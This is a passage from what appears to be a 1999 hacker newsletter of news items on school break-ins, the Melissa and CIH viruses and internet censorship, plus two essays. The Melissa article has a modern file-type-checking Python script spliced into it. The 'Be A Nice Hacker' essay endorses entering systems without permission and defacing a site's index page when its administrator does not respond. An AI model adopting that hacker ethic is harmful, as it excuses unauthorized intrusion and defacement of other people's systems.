subsequent investigation, reports said, the school's computer experts
found that each of the five students had downloaded a "hacker tool" from
the Internet into their personal computer accounts.
FPCHS Assistant Principal Allan Haller said no grades were changed but
that grade files were deleted and exams were compromised.
"It was more mischievous than anything else," Haller said.
Still, he said, the high school's computer network connects to the
districtwide system, meaning the students could have eventually broken
into financial and payroll records or general personnel files.
"It could have been very disruptive," Haller said. "They could have shut
down the whole system."
The arrested students either preferred not to comment or could not be
reached for comment.
Robin Alverson, Steven Alverson's mother, said her son insisted he was
innocent of any criminal wrongdoing and offered to take a lie detector
test or voice-stress analysis to prove it.
"Steven is very computer literate," Robin Alverson said. "He is not
stupid. He knows that anything he does on there can be traced. That's the
thing that gets me."
One of their classmates, who asked not to be identified, said he thought
the group had simply downloaded games off the Internet and that one had a
virus attached to it.
But sheriff's reports describe a highly technical process - set in motion
Jan. 4 - involving hidden and renamed viruses that blocked administrators'
access to their files, making the path more difficult to trace.
"These students were very good," Flagler County School Superintendent
Robert Williams said, alleging that they viewed breaking into the system
as a challenge or game. "They were running our people ragged trying to
keep up with them."
Williams added that it was the first time the district has dealt with
unauthorized internal computer access, and that the disciplinary code will
be revamped accordingly over the summer.
The high school has four classroom computer labs, and Haller estimated
the school has more than 100 computers that connect to the Internet.
In the fall, each student is given his or her own password-protected
computer account to do research or work on word processing programs.
Students and parents must sign an agreement on proper use.
"Some of them choose to use their talents inappropriately," Haller said,
adding that peer pressure may have played a role. "Whether it's a macho
thing, whether it was a battle over school territory or whether they were
out to prove a point - 'We're smarter than you' - it's hard to say."
And as recent news reports demonstrate, even large agencies such as NASA
are not insulated from the potential for break-ins.
"We're a high school," Haller said. "We don't begin to have the kinds of
resources that the federal government has for protection."
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
@HWA
21.0 Danes Finger Swede for Cracking 12,000 Systems
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com
contributed by Phoz
The Danish Police Computer Crime Unit have exposed a 17-year old from Sweden
claiming that he broke into at least 12,000 computers worldwide, including
military, bank, and university owned systems. The reports indicate that he
used an automated version of a BIND vulnerability to gain access and has been
compromising systems since early 1997.
phoz.dk - Translated News Reports.
http://phoz.dk/news/260599.html
@HWA
22.0 EFA Plans Net Censorship Demonstrations
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by photon
The Electronic Frontiers Australia have announced several protest events to
take place on Friday May 28. Local groups around Australia have been urged
to co-ordinate protests against government censorship. Australia's proposed
internet censorship legislation passed the Senate on Wednesday, and is expected
to pass through the House of Representatives some time next week.
Electronic Frontiers Australia
http://www.efa.org.au
Broadcasting Services Amendment (Online Services) Bill 1999
http://www.ozemail.com/~mbaker/amended.html
List of Australian Representatives
http://www.aph.gov.au/
Sydney Morning Herald
http://www.smh.com.au/news/9905/27/pageone/pageone7.html
Thursday, May 27, 1999
Internet providers plotting revenge over bill
By LAUREN MARTIN, in Canberra
Angry Internet service providers turned on the Government after its bill to
censor the Internet passed the Senate yesterday.
Requests from Government computer users were diverted to a protest page
which made the users wait 120 seconds before reaching their desired
destination.
"Get used to the delay," came the message. It was a warning that the plan
would slow the system.
Civil libertarians also protested by turning their computer Web site screens
black to mark their belief that the Government had - in the words of
Democrats Senator Natasha Stott Despoja - "turned its back on the Internet".
Anti-censorship group Electronic Frontiers Australia is organising nationwide
rallies for tomorrow in the real world - Sydney, Melbourne, Perth, Brisbane,
Adelaide and Wollongong.
One family-owned Internet provider in western Sydney, RP Internet Services,
yesterday was offering a month's untimed calls or 500 megabytes of data for
clients who showed up.
The company hopes to hire a hearse for the Sydney protest, which will move
from Hyde Park to the offices of the Australian Broadcasting Authority and the
Office of Film and Literature Classification.
Already one West Australian-based ISP had sent each senator a copy of
George Orwell's 1984, with a note: "The Online Services Bill is Orwellian in its
implications. It has no place in a free society."
But the bill is expected to move smoothly through the House of
Representatives and become law.
It outlines a complaints-based regime under which the ABA can force Internet
providers to remove material which would be considered offensive or illegal
under film and video guidelines.
If the material is not removed within one working day, ISPs face penalties of
tens of thousands of dollars.
The chief executive of the Internet Industry Association, Mr Peter Coroneous,
said the bill represented a "huge challenge".
"This has never been attempted anywhere in the world before, and people must
realise that we cannot necessarily come out with a magic bullet tomorrow."
The Communications Minister, Senator Alston, said the bill would "protect
Australian citizens, especially children" from unsuitable Internet sites.
But EFA president and Internet lawyer, Mr Kim Heitman, said it would not
protect anyone.
International sites (more than 90 million) could not be effectively blocked, he
said. Adult sites based in Australia would move offshore or underground.
"The internet is going to effortlessly evade the bill," Mr Heitman said. "It does
nothing but make us an international laughing stock for saying we can do the
impossible - it's a con job ...
"If the Government was serious about Internet content, they would pay to
educate parents and give police the resources to hunt down people who create
illegal content."
@HWA
23.0 Design Principles for Tamper-Resistant Smart Card Processors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Silicosis
The Advance Digital Security Research Department of
the University of Cambridge Computer Laboratory has
released an excellent paper on the security weaknesses
of smart cards and describes several methods of
extracting protected data and software from smart card
processors. Anyone who has been doing any smart card
hacking should probably read this.
Design Principles for Tamper-Resistant Smart Card Processors
http://www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf
@HWA
24.0 Melissa finds a mate
~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
Melissa will not Die
contributed by nVirb
Variants of the Word macro virus known as Melissa
continue to appear. This time the mutant disguises itself
in a document named '.rtf' as opposed to '.doc', which
helps to hide it from anti-virus software. It has been
speculated that Melissa and a virus known as CAP,
discovered in 1997, may have met in the wild and
mutated together.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11162,00.html
Melissa Mutant Appears
Virus variation is disguised as an RTF file and
hides from vaccines.
by Matthew Nelson, InfoWorld Electric
May 27, 1999, 3:55 a.m. PT
The Melissa virus, which swept across networks
around the world last month, has popped up again in a
mutated format, which may have occurred when it
came into contact with another virus.
Melissa's latest variation uses a macro virus to
replicate itself across networks as the original did, but
now it changes the file extension of the Word
document from .doc to .rtf. This may effectively
camouflage the virus from antivirus systems that look
only for the .doc version of the attack.
The virus is not actually an RTF document, but is a
Word file masquerading as an RTF file, as RTF files
cannot contain macros.
"An RTF file cannot contain macros, so it cannot
contain macro viruses," says Sal Viveros, group
marketing manager for Total Virus Defense at Network
Associates, which was contacted about the virus by a
user. "But with Word you can name your extensions
any name you want, so all this virus writer did was
change the list.doc in Melissa to list.rtf."
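The point Viveros makes is that the extension is a label chosen by whoever names the file, while the format is fixed by the file's contents: a Word 97 document is an OLE2 compound file whatever it is called, and genuine RTF is plain text that cannot carry VBA. The following is an added example, not code from the article or from Network Associates, showing how a mail gateway or triage script can classify an attachment by its leading bytes and flag an extension that disagrees with them. The OLE2 and RTF signatures are well-known file magic; the `_VBA_PROJECT` stream-name scan is a raw-byte heuristic rather than a full OLE2 directory parse, and the two sample blobs are constructed in the block (a fake header plus a stream name, and a harmless RTF string), not real malware.

```python
"""Classify an attachment by its leading bytes instead of trusting its extension."""
import os

# Well-known file signatures (not taken from the article):
# OLE2 / Compound File Binary header, the container used by Word 97-2000 .doc files.
OLE2_MAGIC = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
# Genuine Rich Text Format files are plain text starting with the control word "{\rtf".
RTF_MAGIC = b"{\\rtf"
# Directory entry names inside an OLE2 file are stored as UTF-16LE; a document that
# carries VBA macros has a "_VBA_PROJECT" stream. Heuristic scan, not a full OLE2 parse.
VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def sniff_format(data: bytes) -> str:
    """Return 'ole2', 'rtf' or 'unknown' from the file signature alone."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.lstrip().startswith(RTF_MAGIC):
        return "rtf"
    return "unknown"


def has_vba_storage(data: bytes) -> bool:
    """Heuristic: an OLE2 container that names a _VBA_PROJECT stream holds macros."""
    return sniff_format(data) == "ole2" and VBA_MARKER in data


def assess(filename: str, data: bytes) -> dict:
    """Compare the extension's claim with the sniffed format and report the verdict."""
    ext = os.path.splitext(filename)[1].lower()
    fmt = sniff_format(data)
    # What each extension is supposed to contain; unknown extensions make no claim.
    expected = {".rtf": "rtf", ".doc": "ole2", ".dot": "ole2"}.get(ext)
    mismatch = expected is not None and fmt != expected
    return {
        "filename": filename,
        "claimed": ext,
        "actual": fmt,
        "extension_mismatch": mismatch,
        "macro_capable": fmt == "ole2",   # only the OLE2 container can carry VBA
        "vba_present": has_vba_storage(data),
    }


# Constructed samples (not real malware): a minimal fake OLE2 header padded out to a
# 512-byte sector followed by a UTF-16LE stream name, and a harmless genuine RTF file.
FAKE_DOC_WITH_VBA = OLE2_MAGIC + b"\x00" * 504 + VBA_MARKER + b"\x00" * 64
GENUINE_RTF = b"{\\rtf1\\ansi Hello, this is a plain RTF document.}"

if __name__ == "__main__":
    for name, blob in [("list.rtf", FAKE_DOC_WITH_VBA), ("notes.rtf", GENUINE_RTF)]:
        print(assess(name, blob))
```

Run as a script it prints one verdict per sample; `list.rtf` comes back as an OLE2 container with an extension mismatch and a VBA stream name present, which is exactly the case an extension-only filter misses. A production filter would go further and walk the OLE2 directory rather than scan raw bytes, but the ordering of the checks is the lesson: decide the format first, then ask whether the name agrees.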
Mutating in the Wild?
The RTF Melissa virus is similar to the CAP virus,
which was discovered in 1997 and altered .doc files to
.rtf files. CAP was summarily added to antivirus
application lists to guard against.
But given the similarity of the two viruses, and the
possible results of an interaction between the two,
Viveros speculates that the two viruses might have met
and mutated in the wild.
If a system infected with CAP virus also contracted
Melissa, then CAP could have altered the Melissa files
to replicate as RTF files and then continued to spread
the infection.
"It could have been that someone had the CAP virus on
their system who got infected by Melissa," says
Viveros. "Maybe it was accidental that this was
changed to RTF."
There is no way to be sure, Viveros adds. This new
version of the Melissa virus is one of many copycat
viruses discovered since the initial outbreak of the virus.
To protect against the latest version of Melissa,
Network Associates and other antivirus vendors
recommend that you update your antivirus data
definitions regularly and be cautious opening
suspicious messages, especially ones fitting the
Melissa profile of "Important message from ..".
@HWA
25.0 punkz.com sets up a feedback page for the presidential 'cyberwar'
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
The Internet a Tool of War?
contributed by simonsays
Should the United States use the Internet as a tool of
war? A page has now been set up where you can email
the President with your concerns in response to the
allegation that the CIA will break into various banks to
mess with official Yugoslavian bank accounts.
punkz.com/sixtoed
@HWA
26.0 It's that time of the month again; when the 26th rolls around, look out...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
I thought we already had a fix for the CIH virus, but apparently the
Aussies want in on the action as well, so here's yet another one... -Ed
Chernobyl Virus Cure Found in Australia
contributed by nvirB
With the 26th of the month arriving quickly, developers
have been scrambling to create a fix for variants of the
CIH or Chernobyl virus, which may strike tomorrow. CIH
attacks a system by corrupting both the File
Allocation Table and the BIOS. Developers in Australia
claim that they have created a program that will rebuild
the FAT of an infected system. However, they
have been unable to solve the BIOS corruption problem.
News.com.au
http://technology.news.com.au/techno/4286612.htm
Local developer nukes Chernobyl bug
By IAN GRAYSON
25may99
A QUEENSLAND software expert has developed a fix for the malevolent
CIH virus, which corrupts hard drives, making PCs inoperable.
The virus, dubbed Chernobyl because it struck on the anniversary of
the nuclear accident, hit hundreds of thousands of PCs worldwide on
April 26.
CIH virus outbreaks have been most prevalent in the Asian region.
Some experts say this is because of the large amount of pirated
software in use there, and the fact that many CDs were infected at the
time of manufacture.
A variant of the virus has been found that will trigger tomorrow, and
could continue to strike on the 26th of each month until it is removed
from a system.
Virus expert with Queensland firm Hamilton Multi-media, James Wallis,
said he had created a fix that overcame the impact of the virus,
allowing users to access data on their hard drives.
"We sat down and figured out exactly how the virus corrupts the disks
and set out to develop a way to fix it," he said.
Mr Wallis said it took six 14-hour days to create the fix.
The company has made the fix available as a free download from its
Web site.
He said the virus could be beaten because only data in the first portion
of a hard drive, including the file allocation table, was corrupted.
The remainder was left intact but inaccessible until the lost section was
rebuilt.
"Our program starts at the end of the disk and works backwards," he
said.
"Using sophisticated algorithms, it recreates the data at the beginning
of the drive."
Mr Wallis said the fix had been used successfully to resurrect more than
a dozen infected hard drives brought in by customers.
More than 180 copies of the fix had been downloaded from the Web
site in the week after it was made available.
But Mr Wallis said little could be done for PCs in which the virus had
also attacked the BIOS chip. "In many cases it is a matter of having to
replace the chip because there is nothing that can be done in software
to fix it."
27.0 Submission: "Be A Nice Hacker" by System
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
be a nice hacker...
by system ( 21st may 1999).
--------------------------------------------------------------------------------
[ Introduction. ]
I wrote this article because there are so many more crackers than real hackers in
Indonesia and all over the world.
--------------------------------------------------------------------------------
[ General description. ]
A hacker is a person who can enter some computer system without anybody
knowing about it. Generally a hacker does not intend to publish this intrusion to
the internet community; they don't like publicity, they only want to try the
security, whether it is good or bad. If they find the security is bad or weak, they
will tell the administrator that there is a hole in their system, and
suggest the administrator fix it before something bad happens to their system.
But these days, this has been forgotten by those who call themselves
hackers. There are so many hacking / cracking scenes that exist only for publicity
at this time. They don't obey the ethics that stand behind the underground world.
--------------------------------------------------------------------------------
[ A details description. ]
Being a hacker, you must remember one thing: " DO NOT INTEND TO BREAK THE SYSTEM ".
We must keep this in ourselves, if you are a real hacker of course. A hacker,
as I already told you at the start of this article, only gets inside the system and
looks around; if they find any hole in the system, they will tell the administrator
about the hole. The hacker never breaks or changes the data inside that system. Even if
they have the capability to break and change that data, look: they only look,
read and study it; if it is good for them they keep it in their mind, if not they
leave it without a trace.
I know this probably sounds pretty boring for you guys who have just got into this scene,
and sometimes the question that exists in your mind is " So what's the benefit for me ? ".
Well, the benefit is the knowledge that you get; a hacker never does something for their
own purpose. They only study and study to get a lot of knowledge.
So what is the deal with this knowledge ?
To answer this question, you must look at the things surrounding you. Let's take the
easy ones: the monitor, the keyboard, the CPU, the mouse that you are using right now, where
do they come from ? From science, isn't it ? Where does science come from ? From
knowledge, isn't it ?
Knowledge is the most important thing in this world, and I believe all knowledge will
be used, maybe not at this time, but it will be in the next couple of years or more.
Try to think objectively: in old times Leonardo Da Vinci painted how a helicopter works
in his notepad, and as all of you know, in his time people didn't even have any conception
of a flying copter. But a few years later, that could happen, as we know now. You
see, that is the real value of knowledge.
Too bad, these values of knowledge have been forgotten just like that; many of our pals
from Indonesia would rather break the system and change the data that exists on it. One
thing that really happens in Indonesia is that they only want to get free internet accounts
rather than knowledge. If this still happens in the next couple of years, what is the main
purpose of the internet ?
I tell you this not to make certain people happy, but because this negative phenomenon should
go away from Indonesia, because Indonesian people cannot think smart if they keep using
the internet in the wrong way.
Some people tell me that this is a fair position, because the telephone and internet fees
in Indonesia are very expensive if we compare them with other countries. Yes, this is true,
but this is wrong thinking. Don't look from one side, but look at two sides or more. If
you are on the ISP and telephone side, you will see what is happening to them. They will go broke
if you keep doing this.
Okay, back to the main subject. Why do Indonesian hackers like to break the system ?
I am not 100% sure, but I think this happens because they lack information, especially about
the ethics of the underground world. It is our job to tell them, so this will not happen
again in the future.
I'm not a hacker, but I will tell you some ethics that I know :
- Do not break the system
- Do not change the data that exists on the system
- Tell the administrator about the hole that you have found
- Don't even try to delete all files in their system. ( If on a web server, please don't delete all
the HTML / scripts in their directory; if the administrator doesn't respond to your email, change the
index.html with your own words, but keep the old one; rename the old one, for example to oldindex.html.
As I know it, this only happens if the administrator does not respond to your email within 48 hours ).
- And for the administrator, you also need to obey the ethics. Keep the hacked version of index.html
for 24 hours.
Let me tell you, if you obey these ethics, people will respect you, and you could even become friends with the administrator in no time.
--------------------------------------------------------------------------------
[ Summary. ]
- Being a hacker doesn't mean you will be famous in a short time.
- A hacker's job is not an easy one.
- A hacker without ethics is just a loser's mind.
- Remember, the hacker's only purpose is knowledge.
##################################################################
This article is a translated version of " Jadilah hacker yang benar "
written by System on Friday 21st May. You can use this article
/ change it as you like, as long as you give me some credit.
I really like all comments / suggestions from you; please email them to
system@hackerlink.or.id. Check out http://www.hackerlink.or.id for the
Indonesian underground news center.
##################################################################
@HWA
28.0 Hacking Memes by Stephen Downes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Pasty Drone, NewsTrolls
Hacking Memes
(Viewing this article is illegal in Australia)
This essay is about subversion.
1. The Essence of the Meme
The concept of the meme has been working its way around the web for a while
now, instantiating itself in Wired's regular feature, Hype List, in articles, and in
general currency.
As David Bennahum writes at the top of each issue of Meme, a meme is a
contagious idea that replicates like a virus, passed on from mind to
mind. Memes function the same way genes and viruses do, propagating
through communication networks and face-to-face contact between
people.
The tune you can't get out of your head, the phrase you keep using in your
conversation, the image of the perfect donut - these are all memes, ideas which
have passed from somewhere out there into your head and into your
consciousness.
Transference is the essence of the meme. Principia Cybernetica Web defines it as
"an information pattern, held in an individual's memory, which is capable of being
copied to another individual's memory." The Hacker's Dictionary defines it as "An
idea considered as a replicator, esp. with the connotation that memes parasitize
people into propagating them much as viruses do."
The concept, we are told, originates in Richard Dawkins's 1976 book The Selfish
Gene. The word 'meme' sounds like 'gene' and has similar properties. Humans,
from the point of view of either gene or meme, are the means by which genes - or
memes - are propagated. Animals, plants, and even ourselves, are merely their
disposable "survival machines".
Our human capacity to communicate consists in our ability to transfer ideas from
one person to another. This is not to say that such transference is perfect. We all know
the story where the message gets changed as it is whispered ear to ear down a line
of people. But it is reliable. Most of the time, the receiver gets the information the
sender wanted to convey.
Different forms of communication operate more or less effectively. A casual
conversation you have on the bus will be forgotten by day's end, while this essay
may linger in your mind a few days longer. Neither conversation nor essay,
however, has the staying power of the McDonald's jingle (sing it with me: You
deserve a break today...). Mere transference is not sufficient. For an idea to take
hold in another person, it must be internalized, it must be what Dreyfus and Dreyfus
call the expert, or intuitive, state of knowledge.
From the standpoint of humans, ideas are the currency of the information
economy. An idea which replicates well is worth money, because the idea that
implants itself as intuitive knowledge acts as a determinant of behaviour. The best
way to get a person to buy your product or to use your service is to internalize it, to
make dialing 10-10-800 an action. In advertising it's an old rule of thumb: mention
the product name three times in a 15 second spot.
As Andrew Garton laments,
The record industry maintains its status in the global economy and its
income streams by way of repetition. Music that is played over and over
again so much that it creates its own audience that in turn purchase its
representation to listen to it over and over again in their homes, their
cars, walkmans, bathrooms... anywhere one can think to place a
speaker.
Ideas - and not just advertising - transmit themselves through repetition.
2. Advertising
Repetition alone worked in the old days of limited media. When the sources of
information were few and uniform, when there were three networks and one
message. Today's consumers are not only more sophisticated - merely making
them remember is no longer enough - consumers are the battleground for
information wars, with messages flying at them from all directions. Drive down any
city street and look at the images: one in ten (if you're lucky) is an actual traffic
signal; the rest are trying to implant some idea, some behaviour, into your mind.
Advertising today looks for stronger hooks, and it finds them in association and
self-identification. The concept is especially simple: find (or define) a person's
conception of self which is pleasing. Mold that conception such that the use of a
product or service is essential to that conception. Imprint the idea that in order to
be yourself, you need to purchase such-and-such a brand.
Nike, for example, understands this. After losing market share to Reebok, Nike's
new advertising campaign focussed less and less on shoes and more and more on
image. As Randall Lane explains in a recent Forbes article,
Nike's Phil Knight isn't selling shoes. He's selling attitude....
Nike would sell not shoes but the athletic ideals of determination,
individuality, self-sacrifice and winning....
Nike ads almost never pitch product--or even mention the company's
name. They create a mood, an attitude, and then associate the product
with that mood. Call it image transfer. Cool ads, cool product. As Wieden
puts it: "We don't set out to make ads. The ultimate goal is to make a
connection."
The idea behind Nike's ads is to transfer a sense of identity from the person to the
product.
3. The Corporate Pitch
People living in western democracies are flooded with advertising. The illusion is
sustained that they are being offered choice, but in reality, they are being presented
with a uniform message. Western society does not consist of many cultures,
rather, more and more, they are being subsumed into a single culture.
The reality of this hit home for me when I found myself listening to - and enjoying -
Meredith Brooks's recent top 10 song, Bitch, when I realized I was watching an
advertisement for the movie Practical Magic. Brooks's song - fresh, rebellious,
catchy - was appropriated and incorporated into the larger media package. Indeed,
it seems that most popular music today ties in with a movie or television show -
and that most movies and television shows tie in with additional product lines.
These tie-ins define not only the breadth but also the limits of popular culture. Even
rebellion is commodified - if it is not commodified, it is not shown. 'Culture' in our
society, both from the popular point of view and even in academic studies - means
'mass culture', as defined by the tightly woven network of the mass media meme.
As author and pundit Carrie McLaren complains:
The real disappointment lies in (scholars') abject inability to recognize
'popular culture' anywhere but in the officially-sanctioned showplaces
of corporate America; their utter dependence on television to provide
them with an imagery of rebellion.
Or as Mark Dery observes in his classic essay, Culture Jamming,
Corporate ownership of the newsmedia, the subsumption of an
ever-larger number of publishing companies and television networks
into an ever-smaller number of multinationals, and the increased
privatization of truth by an information-rich, technocratic elite are not
newly-risen issues. More recent is the notion that the public mind is
being colonized by corporate phantasms---wraithlike images of power
and desire that haunt our dreams.
4. Hyper Reality
Steve Mizrach, Culture Jamming: The Information War of the 90s:
the French philosopher Baudrillard calls our postmodern existence
"hyperreality." Real experiences and things have been replaced with
simulacra - copies without an original. Due to the power of mass media
advertising, our relationship to the signifier has changed. Now it hides
the absence of a signified: conceals the inability to deliver real
satisfaction by cleverly simulating it. Part of our hyperreal lives is the
fact that our simulations are more real than real. Given a better imitation,
people choose it over the real thing; hence Disney's Matterhorn enjoys
more visitors than the real one in Switzerland. More insidiously, through
various obfuscations, people come to think the simulacrum is the real
McCoy, and forget about the historical and physical reality it represents.
Modern advertising critics like Mark Crispin Miller often note the hidden
messages concealed within the cool graphics and media saturation of
Madison Avenue and MTV. Originally, they suggest, advertising often
connected the product being sold with some sort of self-image or way of
life (pastoral, pleasant, family-oriented.) Often, it was conveyed that the
product would somehow confer various advantages - popularity,
sexiness, fame, success, power, even individuality. Today, ads are filled
with a strange sort of rugged selfishness, misanthropy, and
mean-spiritedness ("touch my doritos and die.") A person is told sternly
to buy as much as they can of the product but never to share with
friends. "Get your own," they're told. While various moral crusaders
seek to combat the various sexual innuendos of TV programming, they
rarely challenge the more subtle but socially disruptive images found in
commercials and other advertising.
The product, no longer able to offer satisfaction on its own ground ("a
potato chip is a chip is a chip"), instead offers the consumer a chance to
be part of a certain 'crowd' or 'scene.' They belong to a cool "product
tribe," revelling in the image and sensibility that the product somehow
mystically confers - the fetishism of commodities, hyperaccelerated for
Generation X. Analysts of postindustrial America suggest this is the
secret hidden within these advertising campaigns - that more and more
people are being sold style, image, and celebrity, since there is no
substance or material satisfaction to the product-in-itself. Concealed
within the jump-cut flash of postmodern advertising is a simple code:
consumption is a mode of transcendence, a way to take part in
something larger than yourself, "the Pepsi Generation."
Corporations utilize various techniques to carve Americans into
various market profiles - not based on what products they use, but on
what media messages they respond to. In other words, they
are to be sold on the images they want to project to themselves and
others, and not on the intrinsic usefulness of consumer items.
Whatever values they supposedly respond to, are translated into
clever pitches, suggesting that the product somehow represents or
embodies those values. Subliminal seduction has never been that
important in advertising, despite the hype, but the use of semiotic
strategies certainly has. Products are often "pitched" to specific ethnic
groups, minorities, or sub-cultures, often using the Marcusian
co-optation strategy of appealing to their own sense of difference or
deviance. ("Wear our clothes, and then you'll be a real rebel.")
5. The Information War
Jesse Hirsh:
didn't you hear? they've declared information war against everybody.
yep, that's right, the digital economy is really the perpetual war
economy. Like genesis the great flood is on, only we're the ones being
flooded, or rather bombarded by information, seeking our conversion to
the holy faith of consumerism, otherwise known as virtual reality.
and of course in declaring war the state has identified its enemies and
scapegoats: hackers, phreakers, and anarchists, all of whom are
presumed terrorists.
We tend to think of the media message as pertaining to products and services only,
and to restrict our concept of the tie-ins to toys, clothing, and running shoes. But
the uniform image being broadcast extends well beyond consumer purchases; it is
devoted to creating and maintaining the consumer society. No element of life is
sacrosanct; all elements of society are infused.
On the one hand, non-corporate forms of information - any information - are
attacked. In some cases, the strategy is straight-forwardly political. Herbert Schiller,
as quoted by Dery:
The commercialization of information, its private acquisition and sale,
has become a major industry. While more material than ever before, in
formats created for special use, is available at a price, free public
information supported by general taxation is attacked by the private
sector as an unacceptable form of subsidy...An individual's ability to
know the actual circumstances of national and international existence
has progressively diminished.
In Canada and other nations, we see this as the incessant attacks on public
broadcasting networks such as the Canadian Broadcasting Corporation.
On another front, it involves attacking the integrity and credibility of alternative
news sources. A recent National Post article on the CBC's coverage of biotechnology
is typical. The author, Terence Corcoran, writes scathingly,
Ideology certainly dominated CBC Radio's
This Morning show yesterday. Reporter Don
Carty is a smooth-talking manipulator of
words who gives his slanted reports a thin
veneer of objectivity.
The corporate culture strives for the middle ground, to portray themselves as
objective and neutral; any position from outside that camp is ridiculed as "biased"
and "political".
Alternatively, public media can be co-opted. Hence, for example, the sale of the
educational Access Network by the Government of Alberta to the CHUM Media Group. Or
the infiltration of the American Public Broadcasting System by corporate interests,
with - as Carrie McLaren observes - inevitable results:
In the wake of the Disney/ABC merger, a Young and
Rubicam (huge advertising firm) survey of 8,500 brands
worldwide concluded that the most eligible brand for
acquisition is the Public Broadcasting Service. Surprise,
the home of "educational" programming like Barney and
Nova is one big non-commercial commercial. Says
PBS spokesperson Stu Kantor, "In terms of
differentiation and personal relevance, it is the No. 2
(behind Disney) media brand among the total
population."
The mainstream media's fostering of a sanitary corporate image extends well
beyond news and advertising. Situation comedies, dramas and movies - the
mainstream of 'popular culture' - are plagued with product placement and are
passed through the image scrubber before they air. NBC's handling of Atomic
Train is typical of the many instances reported by the Student Activists' Network.
Wayne Grytting:
After heavily promoting the movie's factual basis, NBC suddenly
changed its mind with "no input" from its parent company, GE, a big
investor in nuclear power. Alerted to the "fact" that nuclear wastes are
not transported by trains, they added a disclaimer emphasizing the
movie's fictional character which they showed at every commercial
break. Then they overdubbed every mention of nuclear waste with the
phrase "hazardous waste", thereby achieving the look of a dubbed
Japanese horror film.
The image of the world that we receive through popular culture - whether in music,
in the cinema, or on television - is a carefully polished version of reality. Mark Dery:
The commercialization of information, its private acquisition and sale,
has become a major industry. While more material than ever before, in
formats created for special use, is available at a price, free public
information supported by general taxation is attacked by the private
sector as an unacceptable form of subsidy...An individual's ability to
know the actual circumstances of national and international existence
has progressively diminished.
As the band Negativeland writes,
It is simply inconceivable that this daily, never ending stream of public
suggestion and desire creation has no effect or influence on our spirits,
our health, our jobs, our laws, our environment, our culture, our political
process, or our national and international policy.
6. Control of the Classrooms
The battle extends to all corners of the information nation, even into the sanctity of
the kindergarten classroom. Knowing that repetition and imprinting are key,
advertisers are keen to infuse their message into the curriculum. Advertisers, for
example, recently placed their product in mathematics textbooks.
"This looks like product placement, as they do in the movies," said
David Walsh, director of the National Institute on Media and the Family,
based in Minneapolis, which studies the effect of advertising on families.
"The effect is the same. It gets at what I call the golden rule of influence,
which is when the person being influenced doesn't even know it."
Media groups such as Channel One place television news shows into classrooms.
As they say on their website,
Channel One News is a daily, televised, 10-minute newscast that is
beamed via satellite during the school year to each of the 12,000 schools
in the Channel One Network community. Channel One News features
stories on breaking news and in-depth issues that affect the world, the
nation and specifically America's teenagers.
Leaving aside the question of advertising in education, an examination of what
Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks
students how they liked Star Wars, covered Alanis Morissette, commented on body
image, and reported "Live from Mt. Everest".
The message broadcast to students on Channel One is clear: our culture is defined
by the movies and music we see and hear, our culture is the best, and the best
path to self-actualization is to immerse ourselves in this culture.
Listen to Channel One on freedom in China:
Behind the Chinese government's restrictions are cultural and historical
factors. For thousands of years, Chinese culture has been based on
Confucian values, which people have a respect for authority. The ruler
of the people is a father figure whom everyone must obey. The Chinese
government's existing authoritarian style of leadership follows the
ancient way of emperors who ruled China with "the mandate of
Heaven." Individualism is not highly valued in Confucianism. Instead,
people are encouraged to act in the best interest of the family and
community.
The Chinese culture, according to Channel One, is inherently and irredeemably
evil, based on authoritarian "Confucian" values. Such an account misrepresents
both Chinese culture and Confucianism. By contrast, the American culture is
painted in pure tones,
America was founded by English colonists who wanted independence
from Great Britain. The United States also has become a haven for
immigrants fleeing religious and ethnic persecution in other countries.
Because of these historical events, individualism and freedom is highly
valued in American culture.
Here we have not only an assumption of genetic and racial purity, we also have a
conflation of "freedom" and "individualism". And - leaving aside the fact that the
dominant religion in the United States - Christianity - is at least as authoritarian as
Confucianism, the 'fact' of freedom in the United States is traced to its religious
roots.
Advertisers have long known that imprinting is best accomplished through
marketing to kids. The battle for the airwaves and print media has been won. The
battle for the classrooms of the nations is just being engaged.
Hacking Memes
7. The Counteroffensive: Words as Weapons
The counteroffensive is being mounted by a variety of forces who - until the advent
of the internet - had few means of communication and interaction. The
counteroffensive - an anti-cultural diatribe led by pagans and witches, socialists,
anarchists and libertarians, webgrrls and riotgrrls, homosexuals and lesbians,
environmentalists and consumer advocates - has moved from the trenches of
alternative cafes and billboard defacing to the mainstream of online culture.
The counteroffensive - now armed with the tools of mass media - is a guerilla
operation using the word as weapon, as described by Dery:
The answer lies, perhaps, in the "semiological guerrilla warfare"
imagined by Umberto Eco. "[T]he receiver of the message seems to
have a residual freedom: the freedom to read it in a different way...I am
proposing an action to urge the audience to control the message and its
multiple possibilities of interpretation," he writes. "[O]ne medium can be
employed to communicate a series of opinions on another medium...The
universe of Technological Communication would then be patrolled by
groups of communications guerrillas, who would restore a critical
dimension to passive reception."
Or as the Quebec Public Interest Research Group puts it,
We can break the homogeneity of the media monopoly by expressing
ourselves with our own media. Taking back our media means taking
back our freedom and engaging in a revolution of many minds against a
common enemy. Through workshops, panel discussions, and lectures,
events such as Liberating Media seek to encourage and inspire
participants to take back our media and our freedom in the diversity of
forms in which they both exist.
The methodology of counterattack involves inserting counter-memes into the
media mainstream. It is the idea of the meme conceived as virus taken to its logical
extreme. This idea expresses itself even in Dawkins's seminal The Selfish Gene
